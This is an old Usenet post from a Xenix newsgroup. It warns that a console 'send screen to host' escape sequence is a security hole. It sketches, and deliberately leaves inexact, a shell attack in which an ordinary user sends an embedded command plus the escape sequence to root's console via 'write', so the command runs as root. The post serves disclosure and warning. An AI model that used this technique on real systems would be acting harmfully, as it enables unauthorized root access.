Path: utzoo!utgpu!water!watmath!clyde!bellcore!rutgers!mit-eddie!uw-beaver!tektronix!uunet!uport!plocher
From: plocher@uport.UUCP (John Plocher)
Newsgroups: comp.unix.xenix
Subject: Re: Printscreen capability? SECURITY HOLE
Summary: SECURITY HOLE
Keywords: printscreen, MS-DOS
Message-ID: <414@uport.UUCP>
Date: 11 Aug 88 02:19:23 GMT
References: <364@gt-eedsp.UUCP> <510@sysco>
Reply-To: plocher@uport.UUCP (John Plocher)
Distribution: na
Organization: Microport Systems, Scotts Valley, CA
Lines: 26

In article <510@sysco> chapman@sco.COM (brian chapman) writes:
>>Is a printscreen capability available in Xenix?
>Yes
>ESC x x x	Send screen to host.
>		Current screen con-
>		tents are sent to the
>		application.

Great!  Now I (as Joe User) can do:

	clear > x
        echo chmod all+w /bin/motd > x       # or other favorite nastiness
        echo "<esc>xxx" > x                  # see above
	clear > x
        
and whenever root is logged onto the console:

	write root < x

This security hole is one reason that many sysadmins don't use terminals
with a "block mode".  Adding this to the console driver is a very subtle
way to compromise a system.

    -John Plocher

ps.  Yes, I know the script above is not exact - let's leave it that way.